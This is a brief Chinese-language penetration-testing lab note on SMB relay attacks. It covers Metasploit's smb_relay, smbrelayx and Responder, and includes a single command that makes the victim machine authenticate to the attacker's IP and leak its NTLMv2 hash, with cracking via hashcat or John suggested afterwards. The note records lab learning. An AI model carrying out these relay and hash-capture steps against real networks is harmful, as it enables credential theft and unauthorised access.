前言
实验环境
<code>metasploit</code>中的<code>smb_relay 其实质是ms08068</code>
然后在我们的被攻击服务器win7执行一个访问共享命令 dir \\192.168.1.104\c$
这里可以看见获取了ntmlv2hash 可以用hashcat试试爆破(我看见别人是直接通过认证获取到了session但是我无法实现,如果有实现成功请教教我)
然后开启smbrelayx 会在你到本地搭建一个401认证http服务和smb服务都录窃取hash
但是我在win10中遇到了不安全的smb1.0协议
http还是正常的认证
这里应该和msf一样用的是ntmlv2hash
测试结果
win7可以上线 win10不行
一般在渗透测试中 还是得配合nethash中继才有用 当然你也可以选择去john 破解他
当然你得先更改rs conf 80 445 off
这里我们配合rs里面的murp
切记 少就是多 慢就是快
refer